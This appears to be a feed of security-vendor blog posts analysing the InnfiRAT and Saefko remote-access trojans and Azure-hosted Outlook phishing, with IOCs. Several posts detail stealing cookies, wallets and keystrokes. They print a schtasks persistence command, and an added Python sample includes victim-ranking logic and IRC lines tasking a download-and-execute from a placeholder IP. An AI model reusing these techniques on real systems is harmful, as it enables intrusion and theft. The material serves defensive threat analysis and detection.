Inside the LlсiсkнwychhVзjзNзxрFrUOE4656655235232302206601527615541285() [ProcessCheck] routine: All the running processes in the system are obtained, their names are converted to lowercase, and then a check is performed to see if the name matches any of the following strings:
“taskmgr”
“processhacker”
“procmon”
“procexp”
“pchunter”
“procexp64”

If there are any matches, the process terminates. Below are the snapshots depicting the actions performed.

Figure 12: Obtaining processes, converting their names to lowercase, checking specific processes

Figure 13: Converting ProcessName to lowercase

Figure 14: Checking for above-mentioned running processes (process names are obfuscated here)

Inside the wYxйыrоyTHuLдTч212065() [KillProcesses] routine: InnfiRAT obtains the list of all processes running in the system and kills any process whose name contains one of the following strings:
“chrome”
“browser”
“firefox”
“opera”
“amigo”
“kometa”
“torch”
“orbitum”

Figure 15: Kills processes that contain any of the above-mentioned strings

Scheduled execution

Inside the эйviMhйсuьZCпJфшcкLйшuв348374() [ScheduleMalwareExecution] routine: The CMD (cmd.exe) command string is constructed and executed to schedule the malware execution. The command string looks like the one below:

/C schtasks /create /tn WindowsUpdater /tr "%AppData%NvidiaDriver.exe " /st HH:mm  /du 9999:59 /sc daily /ri 1 /f

Figure 16: CMD command is constructed and executed

C&C commands

Here are some tasks performed by the malware based on the commands received from the C&C server:

1. SendUrlAndExecute(string URL)

InnfiRAT downloads the file from the specified URL by calling the routine жRfаeQbrwйfsLGыhчUrEжьFхaяGчрлCдtGжSofьQvдnIмs8383484343838630833542717281211() [DownloadFileFromUrl]. Inside this routine, a directory is first created with the name TEMP inside %AppData% if it doesn’t exist. Then the file is downloaded and saved inside this folder with the name extracted from the passed URL. The URL passed is broken into parts via the delimiter ‘/’ and the last item is used as the file name.

Figure 17: Create folder and download file

Once the download is complete, it calls the routine rLPсаWFоWcTjzпTэBFWkъмзтшпD147152108377454681517643543() [ExecuteFile] with three arguments to execute the downloaded file:
Arg1 = Path of the file to be executed
Arg2 = Arguments to the file to be executed
Arg3 = true

Figure 18: Execute the downloaded file

2. ProfileInfo()

Inside the routine, it collects the following information:
“NetworkInfo”: { "ip", "city", "region", "country", "loc", "postal", "org" }
“PCAdmin”
“PCInformation”: { “FrameWorkDescription”, “Processors”, “PRocessorsCore”, “VideoCards” }

It then sends the information to the C&C server.

Figure 19: UserProfile info being collected and sent to the C&C server

3. LoadLogs()

It calls the GetDlls() routine, which obtains information inside a list of type DownloadDll, where DownloadDll has two keys:
“Path”          represents a relative path to an .exe file
“ByteArray”     binary data

Figure 20: GetDlls being called

After fetching the list, InnfiRAT traverses each element inside the list via a for-loop. Inside the for-loop: The value of the Path key is split using the delimiter “\\”. The second value in the split is the name of the directory. A check is performed to see if the count after the split is greater than 2 and there is no directory with the name obtained from the Path key split inside the executing module directory.
If the check is true, a directory with the obtained name is created. A check is performed to see if no file exists at the path specified by the Path key in the executing module directory. If the check is true, it creates the file and writes the value of ByteArray to this created file. The routine wYxйыrоyTHuLдTч212065() [KillProcesses] is called. Finally, data obtained from UserProfile() is sent to the C&C server.

Figure 21: A directory is created, file is created, and KillProcesses is called; response is sent to the C&C server

4. LoadCookies() - Steal browser cookie information

InnfiRAT calls the GetDlls() routine, which obtains information inside a list of type DownloadDll, where DownloadDll has two keys:
“Path”          represents a relative path to an .exe file
“ByteArray”     binary data

Figure 22: GetDlls being called

After fetching the list, the malware traverses each element inside the list via a for-loop. The following occurs inside the for-loop: The value of the Path key is split using the delimiter “\\”. The second value in the split is the name of the directory. A check is performed to see if the count after the split is greater than 2 and there is no directory with the name obtained from the Path key split inside the executing module directory. If the check is true, a directory with the obtained name is created. A check is performed to see if no file exists at the path specified by the Path key in the executing module directory. If the check is true, it creates the file and writes the value of ByteArray to this created file.

Figure 23: Directory is created, file is created

It creates an empty list of BrowserCook type, where BrowserCook has two keys, namely:
“CookiePaths”
“BrowserName”

The name and corresponding cookie path are retrieved for the following browsers one by one:
“Chrome”
“Yandex”
“Kometa”
“Amigo”
“Torch”
“Orbitum”
“Opera”
“Mozilla”

A BrowserCook type element is created with the fetched information and is added to the list created earlier.

Figure 24: Browser info is retrieved and added to the list

It creates an empty list of BrowserCookie type, where BrowserCookie has three keys, namely:
“Browser”
“FileName”
“FileArray”

Inside two for-loops, elements of the BrowserCookie type are created, where the Browser key and FileArray key are both assigned values using the information from the previously created BrowserCook list, and the FileName is set to _Cookie.txt if the browser name for the current element is not “Mozilla”, or else it is set to Cookie.txt.

Figure 25: BrowserCookie elements list is built

The harvested BrowserCookie list is then sent to the C&C server and the temporary file and directory are deleted.

Figure 26: File and directory is deleted

5. LoadWallets() - Steal Bitcoin wallets

The malware creates an empty list of the BitcoinWallet type, where BitcoinWallet has two keys, namely:
“WalletArray”
“WalletName”

A check is performed to see if a file for a Litecoin or Bitcoin wallet is present in the system at the following location:
Litecoin: %AppData%\Litecoin\wallet.dat
Bitcoin: %AppData%\Bitcoin\wallet.dat

If it is found, then an element of type BitcoinWallet is added to the list after assigning a name to the WalletName key and reading the corresponding wallet file into the WalletArray key.

Figure 27: File presence is checked, BitcoinWallet element is added to the list

Finally, the created list is sent in response to the C&C server.

Figure 28: List is sent in response to the C&C server

6. LoadFiles() - Steal small text files potentially containing sensitive information

InnfiRAT collects all the .txt files available on the desktop whose size is less than 2,097,152 bytes inside a list of CustomFile types. CustomFile has two keys, namely:
“Name”
“FileArray”

The created list is sent in response to the C&C server.

Figure 29: Files are collected and sent to the C&C server

Figure 30: Inside HcапkцтеuxчI46156665847187238336657104255061.лQtdjюAKMCdскHUжfъqZTzmMнуз68532317728035381607276587242500 [CollectFiles]

7. LoadProcesses() - Get the list of running processes on the victim machine

InnfiRAT creates an empty list of type ProcessInfo, where ProcessInfo has three keys, namely:
“ID”
“Name”
“Path”

It obtains the list of all the processes running in the system and sends the list in response to the C&C server.

Figure 31: Process information is obtained and the list is sent to the C&C server

8. Kill(int process) - Command to kill a specific process on the victim machine

InnfiRAT obtains the list of all the processes running in the system and then, inside a for-loop, the process ID of each obtained process is compared with the process ID passed as an argument to this routine, one at a time. If there is a match, the process is killed and the flag variable is set to true. Finally, a response is sent to the C&C server.

Figure 32: Process is killed and response is sent

9. Screenshot() - Take a screenshot on the victim machine

It calls the qюFpьGoJv97921676245() [CaptureScreenshot] routine and the returned value is sent to the C&C server.

Figure 33: Screenshot captured and sent to the C&C server

Figure 34: Inside the qюFpьGoJv97921676245() [CaptureScreenshot] routine

10. RunCommand(string command) - Execute specified command on the victim machine

This creates a new CMD process, builds the command line argument using the command passed as an argument to this routine, and finally starts the process.

Command line argument: /c + “ ” + command

Figure 35: Received command is executed

11. ClearCooks() - Clears browser cookies on the victim machine for specific browsers

InnfiRAT creates an empty list of BrowserCook type, where BrowserCook has two keys, namely:
“CookiePaths”
“BrowserName”

The name and corresponding cookie path are retrieved for the following browsers one by one:
“Chrome”
“Yandex”
“Kometa”
“Amigo”
“Torch”
“Orbitum”
“Opera”
“Mozilla”

A BrowserCook type element is created with the fetched information and is added to the list created earlier.

Figure 36: Browser info is retrieved and added to the list

The routine wYxйыrоyTHuLдTч212065() [KillProcesses] is called. The BrowserCook type list created earlier is traversed and cookie files are deleted using the CookiePaths key value. Finally, a response is sent to the C&C server.

Figure 37: The routine wYxйыrоyTHuLдTч212065() [KillProcesses] is called, cookie files are deleted, and response is sent to the C&C server

Conclusion

A RAT (remote-access trojan) is a type of malware that includes a backdoor, giving intruders the ability to control the targeted computer remotely and enabling them to perform any number of tasks, such as logging keystrokes, accessing confidential information, activating the system's webcam, taking screenshots, formatting drives, and more. They can also be designed to spread to other systems on a network. Because RATs are usually downloaded as a result of a user opening an email attachment or downloading an application that has been infected, the first line of defense is often the users, who must, as always, refrain from downloading programs or opening attachments that aren't from a trusted source. The ThreatLabZ team continues to monitor this threat and ensure that Zscaler customers are protected.

IOCs

Md5: f992dd6dbe1e065dff73a20e3d7b1eef
Downloading URL: rgho[.]st/download/6yghkhzgm/84986b88fe9d7e3caf5183e4342e713adf6c3040/df3049723db33889ac49202cb3a2f21ac1b82d5b/peugeot.zip
NetworkURL: tcp://62[.]210[.]142[.]219:17231/IVictim
Categories: Security Posts

Saefko: A new multi-layered RAT

Zscaler Research - 52 min 35 sec ago
Recently, the Zscaler ThreatLabZ team came across a new remote-access trojan (RAT) for sale on the dark web. The RAT, called Saefko, is written in .NET and has multiple functionalities. This blog provides a detailed analysis of this piece of malware, including its HTTP, IRC, data-stealing and spreading modules.

Background

A RAT is a type of malware that includes a backdoor for remote administrative control of the targeted computer. RATs are usually downloaded as a result of a user opening an email attachment or downloading an application or a game that has been infected. Because a RAT enables administrative control, the intruder can do just about anything on the targeted computer, such as monitoring user behavior by logging keystrokes, accessing confidential information, activating the system's webcam, taking screenshots, formatting drives, and more.

Upon successful infection, the Saefko RAT stays in the background and executes every time the user logs in. It reads the Chrome browser history looking for specific types of activity, such as visits involving credit cards, business, social media, gaming, cryptocurrency, shopping, and more. It sends the collected data to its command-and-control (C&C) server and requests further instructions. The C&C instructs the malware to provide system information, and the RAT begins to collect a range of data including screenshots, videos, keystroke logs and more. The C&C can also instruct the malware to download additional payloads onto the infected system.

RATs present a unique business threat. They have the ability to steal a lot of data without being detected and to spread to other systems across the network. The ThreatLabZ team also detonated the Saefko RAT in the Zscaler Cloud Sandbox to determine its functionality, communications, and the potential threat.
Technical analysis of the Saefko RAT

Saefko unpacks itself, writes SaefkoAgent.exe to "/%AppData%/Roaming/SaefkoAgent.exe" and executes it. It also copies itself to "/%AppData%/Roaming/windows.exe" and "/%AppData%/Local/explorer.exe" and executes those copies.

Autostart key

Saefko creates a Run key so that it executes at every login. If it is running from an admin account, it creates the following registry key: "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer". Otherwise, it creates the key under the current user: "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer".

Functionality

Saefko first checks whether the internet connection is active by connecting to "clients3.google.com/generate_204". This is the same endpoint Chrome uses for its own connectivity check, so the request on its own does not stand out in proxy logs. Saefko then uses an unusual technique to determine whether the infected system holds anything of value: it reads the browser history, searches for visits to particular websites, and counts the hits per category (listed below). From these counts the attacker can decide which of the infected systems to target first.
The categories it searches for are:

Credit card possibility:
paypal.com 2c2p adyen.com volusion.com pay.amazon.com apple.com/apple-pay/ atos.net authorize.net BIPS bitpay.com bpay.com braintreepayments.com centup.org cm.com creditcall.com cybersource.com mastercard.com digi.cash digitalriver.com dwolla.com elavon.com euronetworldwide.com eway.io firstdata.com fortumo.com pay.google.com/send/home heartlandpaymentsystems.com ingenico.com ippayments.com klarna.com emergentpayments.ne moduslink.com mpay.com neteller.com ofx.com pagseguro payoneer.com paymentwall.com paypoint.co paysbuy.com paysafe.com paytm.com payzone.co.uk crunchbase.com qiwi.com globalpaymentsinc.com reddotpayment.com sagellc.com skrill.com stripe.com squareup.com tencent.com transfermate.com transferwise.com wmtransfer.com trustly.com wepay.com verifone.com xendpay.com pay.weixin.qq.com money.yandex.ru wirecard.com truemoney.com xsolla.com myshopify.com/admin payza.com 2checkout.com 3dcart.com paysafecard.com weebly.com

Gaming activity value:
origin.com steampowered.com g2a.com twitch.tv nichegamer.com techraptor.net gematsu.com estructoid.com pcgamer.com gamefaqs.gamespot.com gamespot.com siliconera.com rockpapershotgun.com gameinformer.com decluttr.com glyde.com gamestop.com microsoft.com/account/xboxlive playstation.com/en-us/network/store nintendo.com/games gog.com game.co.uk itch.io gamefly.com greenmangaming.com gaming.youtube.com

Cryptocurrency value:
etoro.com 24option.com puatrack.com/coinbull2/ luno.com paxforex.com binance.com coinbase.com cex.io changelly.com coinmama.com xtrade.ae capital.com paxful.com kraken.com poloniex.com gemini.com bithumb.com xcoins.io cobinhood.com coincheck.com coinexchange.io shapeshift.io bitso.com indacoin.com cityindex.co.uk bitbay.net bitstamp.net cryptopia.co.nz pro.coinbase.com kucoin.com bitpanda.com foxbit.com.br bitflyer.com bitfinex.com bit-z.com quadrigacx.com quadrigacx.com big.one lakebtc.com wex.nz kuna.io yobit.io zebpay.com hitbtc.com bx.in.th trezor.io electrum.org blockchain.com crypto.robinhood.com exodus.io mycelium.com bitcointalk.org btc-e.com moonbit.co.in bitcoinaliens.com bitcoinwisdom.com coindesk.com cointelegraph.com ccn.com reddit.com/r/Bitcoin/ bitcoin.org/en/blog newsbtc.com blog.spectrocoin.com blog.coinbase.com bitcoinist.com forklog.com abitcoinc.com bitcoin.stackexchange.com news.bitcoin.com blog.bitfinex.com blog.genesis-mining.com

Instagram activity:
instagram.com m.instagram.com

Facebook activity:
facebook.com m.facebook.com

Youtube activity:
youtube.com m.youtube.com

Google+ activity:
plus.google.com m.plus.google.com

Gmail activity:
gmail.com mail.google.com

Shopping activity:
boohoo.com gymshark.com mail.google.com prettylittlething.com showpo.com athleta.com ae.com ruelala.com asos.com superdry.com zaful.com zafulswimwear.com luckybrand.com forever21.com urbanoutfitters.com nastygal.com jcrew.com anthropologie.com allsaints.com uniqlo.com armaniexchange.com fashionnova.com saksoff5th.com target.com macys.com barneys.com zappos.com sneakersnstuff.com yoox.com nike.com simmi.com amazon.com ebay.com walmart.com newegg.com bestbuy.com ftd.com 1800flowers.com glossier.com sephora.com thebodyshop.com ulta.com horchow.com homedepot.com pier1.com bedbathandbeyond.com wayfair.com shoptiques.com viator.com etsy.com cloud9living.com seatgeek.com aliexpress.com alibaba.com

Business value:
linkedin.com twitter.com nasdaq.com ft.com reuters.com nyse.com tsx.com marketwatch.com thestreet.com wsj.com investing.com investopedia.com finance.yahoo.com seekingalpha.com fool.com investorguide.com zacks.com home.saxo forexbrokers.com swissquote.com cmcmarkets.com fxpro.co.uk forex.com dukascopy.com interactivebrokers.com tdameritrade.com bankofinternet.com ally.com bankpurely.com redneck.bank

Saefko also collects additional system and user data, sent under the following field names (spelling as used by the malware):

irc_channel: IRC channel name
irc_nickname: Nickname
irc_password: IRC channel password
irc_port: IRC port for communication with the server
irc_server: Server name
machine_active_time: System uptime
machine_artct: Machine architecture
machine_bitcoin_value: Number of cryptocurrency sites visited by the user
machine_business_value: Number of business sites visited by the user
machine_calls_activity: 0
machine_camera_activity: Number of ".png" files present on the desktop
machine_country_iso_code: Country code fetched from "ipinfo.io/geo"
machine_lat: Latitude of the system's geographic location
machine_lng: Longitude of the system's geographic location
machine_creadit_card_posiblty: Number of payment sites visited by the user
machine_current_time: The machine's current time
machine_facebook_activity: Number of times the user visited Facebook
machine_gaming_value: Number of times the user visited gaming websites
machine_gmail_avtivity: Number of times the user visited Gmail
machine_googleplus_activity: Number of times the user visited Google+
machine_instgram_activty: Number of times the user visited Instagram
machine_ip: Machine IP
machine_os_type: 1
machine_screenshot: Screenshot, encoded in Base64
machine_shooping_activity: Number of shopping sites visited by the user

The RAT sends the collected data to a command-and-control server as shown below:

After getting an "ok" response from the server, Saefko starts the "StartServices" function, which runs four different modules:

HTTPClinet
IRCHelper
KEYLogger
StartLocalServices (USB spreading)

HTTP Client (spelled "HTTPClinet" by the author)

The RAT asks the server for a new task by sending the command "UpdateAndGetTask" together with other information, including machine_ID, machine_os, and privateip, as shown below:

The task is a URL from which the malware downloads a new payload and executes it on the infected machine.
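The history-triage step described above, as an added example in Python (it is not Saefko's code and not from the post): it scores a constructed, in-memory copy of a Chrome-style History database against trimmed versions of the category lists, reporting the counts under the field names Saefko uses. Substring matching against the stored URL, counting each URL once, and the weights used to rank victims are all assumptions, since the post does not show how the count or the prioritisation is computed.

```python
import sqlite3

# Trimmed versions of the category lists above, keyed by the field name Saefko
# reports for that category (field names copied from the post, spelling included).
CATEGORIES = {
    "machine_creadit_card_posiblty": ["paypal.com", "stripe.com", "skrill.com", "pay.amazon.com"],
    "machine_gaming_value": ["steampowered.com", "origin.com", "g2a.com", "twitch.tv"],
    "machine_bitcoin_value": ["coinbase.com", "binance.com", "kraken.com", "blockchain.com"],
    "machine_instgram_activty": ["instagram.com"],
    "machine_facebook_activity": ["facebook.com"],
    "machine_gmail_avtivity": ["gmail.com", "mail.google.com"],
    "machine_shooping_activity": ["amazon.com", "ebay.com", "walmart.com"],
    "machine_business_value": ["linkedin.com", "nasdaq.com", "wsj.com"],
}

# Assumed weights for ranking victims; the post only says the counts decide
# which systems are targeted first.
WEIGHTS = {"machine_creadit_card_posiblty": 5, "machine_bitcoin_value": 5,
           "machine_business_value": 3, "machine_gaming_value": 2}


def build_sample_history():
    """Constructed sample: a Chrome-style History database in memory.

    Chrome keeps history in SQLite, one row per URL in the `urls` table. A
    running browser holds the file locked, so analysis normally runs on a copy.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE urls (id INTEGER PRIMARY KEY, url TEXT, "
                 "title TEXT, visit_count INTEGER)")
    rows = [
        ("https://www.paypal.com/myaccount/summary", "PayPal", 4),
        ("https://dashboard.stripe.com/payments", "Stripe", 2),
        ("https://store.steampowered.com/app/570/", "Steam", 9),
        ("https://www.coinbase.com/dashboard", "Coinbase", 1),
        ("https://mail.google.com/mail/u/0/#inbox", "Gmail", 30),
        ("https://www.amazon.com/gp/cart/view.html", "Amazon", 3),
        ("https://en.wikipedia.org/wiki/Remote_access_trojan", "Wikipedia", 1),
    ]
    conn.executemany("INSERT INTO urls (url, title, visit_count) VALUES (?, ?, ?)", rows)
    return conn


def score_history(conn):
    """Count history entries per category, the way Saefko's triage step does.

    Each stored URL is counted at most once per category; visit_count is
    ignored (assumption: the post speaks of a count of sites visited).
    """
    counts = {name: 0 for name in CATEGORIES}
    for (url,) in conn.execute("SELECT url FROM urls"):
        for name, needles in CATEGORIES.items():
            if any(needle in url for needle in needles):
                counts[name] += 1
    return counts


def rank_victims(reports):
    """Order infected machines by a weighted sum of their category counts.

    `reports` maps a machine id to the dict returned by score_history().
    """
    def priority(item):
        _, counts = item
        return sum(WEIGHTS.get(name, 1) * n for name, n in counts.items())
    return [machine for machine, _ in sorted(reports.items(), key=priority, reverse=True)]


if __name__ == "__main__":
    counts = score_history(build_sample_history())
    print(counts)
    print(rank_victims({"victim-a": counts, "victim-b": {name: 0 for name in CATEGORIES}}))
```

The same scoring is useful from the defender's side: a process other than the browser opening (or copying) the History file, followed by a POST carrying these field names, is the observable footprint of this step.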
Key logger

The malware uses the SetWindowsHookEx API to capture keystrokes and writes them to a "log.txt" file at "\%AppData%\Local\log.txt".

IRC helper

First, the malware disconnects any current IRC connection. Then it sends status information to the C&C as shown below:

pass: password
command: UpdateHTTPIRCStatus
machine_id: unique ID sent by the C&C in an earlier request
irc_status: 1

Next, the malware fetches its IRC parameters:

Server list: it selects a server from the list below
Port: port
Nickname: a randomly generated 7-character name

List of IRC servers and ports (server port):
irc.afterx.net 6667, irc.cyanide-x.net 6667, chat.freenode.net 6667, irc.europnet.org 6667, irc.azzurra.org 6669, irc.rizon.net 6669, irc.dal.net 6667, irc.efnet.org 6667, irc.gamesurge.net 6667, open.ircnet.net 6669, irc.quakenet.org 6667, irc.swiftirc.net 6667, eu.undernet.org 6667, irc.webchat.org 7000, irc.2600.net 6667, irc.abjects.net 6669, irc.accessirc.net 6667, irc.afternet.org 6667, irc.data.lt 6667, irc.allnetwork.org 6667, irc.alphachat.net 6667, irc.austnet.org 6667, irc.axenet.org 6667, irc.ayochat.or.id 6667, irc.beyondirc.net 6669, irc.blitzed.org 6667, irc.bongster.org 6669, irc.caelestia.net 6667, irc.canternet.org 6667, irc.chatall.org 6669, irc.chatcafe.net 6667, irc.chatspike.net 6667, irc.chatzona.org 6667, irc.criten.net 6667, irc.cyberarmy.net 6667, irc.d-t-net.de 6667, irc.darkmyst.org 6667, irc.deepspace.org 6667, irc.dream-irc.de 6667, irc.drlnet.com 6667, irc.dynastynet.net 6667, irc.echo.com 6667, irc.ecnet.org 6667, irc.enterthegame.com 6667, irc.epiknet.org 6667, irc.esper.net 6667, irc.euirc.net 6669, irc.evolu.net 6667, irc.explosionirc.net 6667, irc.fdfnet.net 6668, irc.fef.net 6667

These are public IRC networks, so the C&C channel rides on legitimate third-party infrastructure. The useful signal for defenders is therefore IRC traffic (ports 6667-6669, 7000) from a host or process that has no business speaking IRC, rather than the server names themselves.

Saefko connects to one of these servers and waits for messages. It checks each message for the string "T_T" and uses it as a separator to split the message into parts. Below is the list of IRC functions that the RAT can perform.
According to the command it receives, Saefko responds with the corresponding data.

List of IRC commands (command: description):

dexe: Download a file from a given URL and execute it
hdexe: Download a file from a given URL and execute it (UseShellExecute=false)
vistpage: Open URL
hvistpage: Open URL (UseShellExecute=false)
snapshot: Capture a video frame, encode it in Base64 and send it to the C&C (detailed below); also replies ".oksnapshot"
shell: Execute a command using cmd.exe
tcp: Make a TCP connection to a given IP and port
identify: Send system information: OS type (Microsoft Windows), OS version, OS username, machine name, system directory
opencd: Open the CD-ROM drive (command: set CDAudio door open)
closecd: Close the CD-ROM drive (command: set CDAudio door closed)
screenshot: Capture a screenshot, encode it in Base64 and send it to the C&C
ping: Reply "okping"
camlist: Enumerate the video devices on the system and send the information to the C&C (detailed below)
pwd: Current directory
location: Get the system location from "https://ipinfo.io/geo": IP, city, region, country, latitude and longitude
keylogs: Encode the keylog file (log.txt) in Base64 and send it to the C&C
uninstall: Delete the autostart registry key (Run) and terminate itself

Camlist

Saefko also checks whether the following supporting libraries are present on the system:

AForge.dll
AForge.Video.DirectShow.dll
AForge.Video.dll
Sqlite3.dll

If these files are missing, the malware asks the C&C to download them. Next, it enumerates the video input devices on the targeted system and sends the related information to the C&C.

Snapshot

Saefko also captures video frames from a camera present on the system, encodes each frame in Base64 and sends it to the C&C.

Start USB service

Saefko checks whether a drive is either removable or a network drive, and if so starts the infection routine and copies the files below onto the drive.
Sas.exe
USBStart.exe
usbspread.vbs

Sas.exe is a copy of the malware itself. USBStart.exe is extracted from the resource section of the main binary and contains the code that executes Sas.exe. The malware creates a usbspread.vbs file and executes it. The script walks every directory and file on the drive and creates a ".lnk" file for each one, with USBStart.exe as the target path. When the removable drive is plugged into another system, the original files and folders are hidden, so the user is tricked into clicking a .lnk file instead. The .lnk file launches USBStart.exe, which in turn runs Sas.exe, the main payload, and so the next system is infected. Below is the code of the usbspread.vbs file:

One online forum carries an ad for a cracked Saefko RAT tool, shown below. It is marketed as a multi-protocol, multi-operating system remote administration tool that can be used to launch the malware on Windows and Android devices.

Conclusion

To protect systems from RATs, users must refrain from downloading programs or opening attachments that do not come from a trusted source. At the administrative level, it is always a good idea to block unused ports, turn off unused services, and monitor outgoing traffic. Attackers are often careful to keep the malware from doing too much at once, which would slow down the system and might attract the attention of the user and IT. The Zscaler ThreatLabZ team continues to monitor this threat and others to ensure that Zscaler customers are protected.
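The IRC tasking described in the IRC helper section above, as an added detection example in Python (not from the post and not Saefko's code): it parses raw IRC lines, splits each PRIVMSG body on the "T_T" separator and flags messages whose first token is one of the Saefko commands from the table, plus the "okping" and ".oksnapshot" replies. The sample lines are constructed; the assumption that the command precedes the first "T_T" and the arguments follow it is mine, since the post only says the RAT splits messages on that string.

```python
# Commands from the IRC command table above, plus the replies the RAT sends back.
SAEFKO_COMMANDS = {
    "dexe", "hdexe", "vistpage", "hvistpage", "snapshot", "shell", "tcp", "identify",
    "opencd", "closecd", "screenshot", "ping", "camlist", "pwd", "location", "keylogs", "uninstall",
}
SAEFKO_REPLIES = {"okping", ".oksnapshot"}
SEPARATOR = "T_T"


def parse_irc_line(line: str):
    """Split one raw IRC line into prefix, command, middle params and trailing text."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    if not parts:
        return None
    return {"prefix": prefix, "command": parts[0].upper(), "params": parts[1:],
            "trailing": trailing if sep else None}


def extract_task(text: str):
    """Return (command, args) if the message body is a Saefko task, else None.

    Assumption: the command precedes the first "T_T" and the arguments follow it.
    """
    if SEPARATOR not in text:
        return None
    command, _, args = text.partition(SEPARATOR)
    command = command.strip().lower()
    return (command, args) if command in SAEFKO_COMMANDS else None


def detect_saefko(lines) -> list:
    """One alert per PRIVMSG that carries a Saefko task or a Saefko reply."""
    alerts = []
    for line in lines:
        msg = parse_irc_line(line)
        if not msg or msg["command"] != "PRIVMSG" or msg["trailing"] is None:
            continue
        target = msg["params"][0] if msg["params"] else None
        task = extract_task(msg["trailing"])
        if task:
            alerts.append({"from": msg["prefix"], "target": target,
                           "command": task[0], "args": task[1]})
        elif msg["trailing"].strip() in SAEFKO_REPLIES:
            alerts.append({"from": msg["prefix"], "target": target,
                           "command": "reply", "args": msg["trailing"].strip()})
    return alerts


SAMPLE_LINES = [  # constructed traffic, not a real capture
    ":ops!o@192.0.2.10 PRIVMSG #c2 :identifyT_T",
    ":ops!o@192.0.2.10 PRIVMSG #c2 :dexeT_Thttp://198.51.100.7/dwd/vmp.exe",
    ":ops!o@192.0.2.10 PRIVMSG #c2 :shellT_Twhoami /all",
    ":alice!a@203.0.113.4 PRIVMSG #chat :anyone around? T_T so quiet today",
    "PING :irc.example.net",
    ":kq3zpwb!b@198.51.100.9 PRIVMSG ops :okping",
]

if __name__ == "__main__":
    for alert in detect_saefko(SAMPLE_LINES):
        print(alert)
```

The "alice" line shows why the separator alone is not enough: "T_T" is an ordinary emoticon in chat, so the token before it must also be a known command. The seven-character random nickname ("kq3zpwb" in the sample) is a weaker secondary signal worth recording but not alerting on by itself.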
IOCs

Md5:
D9B0ECCCA3AF50E9309489848EB59924
C4825334DA8AA7EA9E81B6CE18F9C15F
952572F16A955745A50AAF703C30437C
4F2607FAEC3CB30DC8C476C7029F9046
7CCCB06681E7D62B2315761DBE3C81F9
5B516EAB606DC3CC35B0494643129058

Downloader URLs:
industry.aeconex[.]com/receipt-inv.zip
3.121.182[.]157/dwd/explorer.exe
3.121.182[.]157/dwd/vmp.exe
deqwrqwer.kl[.]com.ua/ex/explorer.exe
maprivate[.]date/dhl-miss%20craciun%20ana%20maria%20#bw20feb19.zip

Network URLs:
acpananma[.]com/love/server.php
3.121.182[.]157/smth/server.php
f0278951.xsph[.]ru/server.php
maprivate[.]date/server.php
Categories: Security Posts

Abusing Microsoft’s Azure domains to host phishing attacks

Zscaler Research - 52 min 35 sec ago
Recently, the Zscaler ThreatLabZ team came across various phishing attacks leveraging Microsoft Azure custom domains. These sites are served with a Microsoft-issued SSL certificate, so they are unlikely to raise suspicion about their authenticity. The certificate only proves that the site is hosted on Microsoft's platform, not who controls the content; every tenant, including an attacker, gets it automatically. We notified Microsoft, who quickly engaged to shut these sites down, while we took action to detect and block 2,000 phishing attempts from these domains over a six-week period.

In this blog, we describe two of the prominent vectors used and show several examples of the phishing pages. The following figure depicts the phishing hits that were hosted using the Azure domain (Windows.net) and blocked by the Zscaler cloud.

Fig 1: Phishing hits using the Azure domains web.core.windows.net (green) and blob.core.windows.net (orange)

The following is the Whois lookup information for the Windows.net domain.

Fig 2: Whois lookup info for the Windows.net domain

For these phishing campaigns, the delivery vector was spam email.

CASE 1: In this case, the attacker sends the user a spam email that appears to come from a particular organization, notifying the user that seven emails have been quarantined. It states that, in order to review the emails, the user has to log in with a work or school account.

Fig 3: Spam email with direct phishing link

If the user clicks the "view emails" button, it redirects to the Outlook login phishing page (hxxps://onemailofice365(.)z13(.)web(.)core(.)windows(.)net/index(.)html).

Fig 4: Outlook login phishing page

Some users may be confused by the unknown URL hosting the Outlook login page. To reassure those users, the attackers rely on the SSL certificate issued by Microsoft, as shown below.

Fig 5: SSL certificate page of the hosted phishing URL

The following figure depicts the source code of the phishing page, which the attackers use to collect users' data.
Fig 6: Source code of the phishing URL page

Once the user enters login information, the form posts the credentials to a compromised domain operated by the cybercriminals.

Fig 7: Captured data traffic that has been sent to the attacker's site

CASE 2: In this method, attackers send a spam email with an attached HTML file that looks like a voice message. Once the user opens the HTML file, it redirects to the phishing page hosted on the Azure domain.

Fig 8: Spam mail using the double-extension method

Fig 9: Outlook login phishing page reached from the voice message

In this phishing campaign, the attackers have injected obfuscated JavaScript that checks the submitted credentials against those already in their database, to avoid storing duplicates.

Fig 10: Obfuscated JavaScript that validates user credentials to avoid duplication

The following figure depicts the deobfuscated JavaScript. This code validates the user's credentials and sends them to the attacker's server (hxxps://validr2vtap2l3eh544kb(.)azurewebsites(.)net/v20(.)php).

Fig 11: Deobfuscated JavaScript

Fig 12: User data is sent to the attacker's site using the function getValidatorURL()

In addition to the Outlook phishing campaigns, we have seen other phishing campaigns associated with these Azure domains: Microsoft phishing, OneDrive phishing, Adobe document phishing, Blockchain phishing, and more. The following figures show the different phishing campaigns hosted using the Azure domain (Windows.net).

Fig 13: Microsoft login phishing page

Fig 14: Adobe login phishing page

Fig 15: Blockchain login phishing page

Fig 16: OneDrive login phishing page

Conclusion

The Zscaler cloud blocked more than 2,000 phishing attacks over six weeks that were hosted using the Azure domain (Windows.net). The following diagram represents the various kinds of phishing campaigns that were blocked by the Zscaler cloud.
Fig 17: Detected phishing hits

Fig 18: The Zscaler Zulu URL Risk Analyzer score for one of the phishing URLs

IOCs

